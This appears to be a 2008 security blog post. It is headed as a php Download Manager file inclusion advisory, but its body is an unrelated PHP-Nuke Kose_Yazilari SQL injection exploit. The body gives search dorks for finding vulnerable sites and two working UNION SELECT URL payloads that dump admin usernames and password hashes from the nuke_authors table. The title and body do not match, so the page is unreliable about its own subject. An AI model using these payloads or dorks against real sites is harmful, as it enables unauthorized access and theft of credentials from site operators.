Software, Internet, Networking, And Security Review :: php Download Manager :: February

February 26, 2008

php Download Manager <= 1.1 Local File Inclusion Vulnerability

# PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability
# AUTHOR : xcorpitx
# HOME : www.Hayalet-hack.com / www.zone-turk.net

# WHEN YOU PUT THIS SQL CODE YOU can SEE ADMýN NAME,ADMIN HASH

# DorK 1 : ‘’name Kose_Yazilari op viewarticle artid'’
# Dork 2 : ‘’name Kose_Yazilari op printpage artid'’

# EXPLOIT:
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2F
union%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors

modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2F
UNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors

#Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq

Comments »

The URI to TrackBack this entry is: http://blackraptor.blogsome.com/2008/02/26/127/trackback/

No comments yet.

RSS feed for comments on this post.

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Software And Internet Blog

February 26, 2008

php Download Manager <= 1.1 Local File Inclusion Vulnerability

Comments »

Leave a comment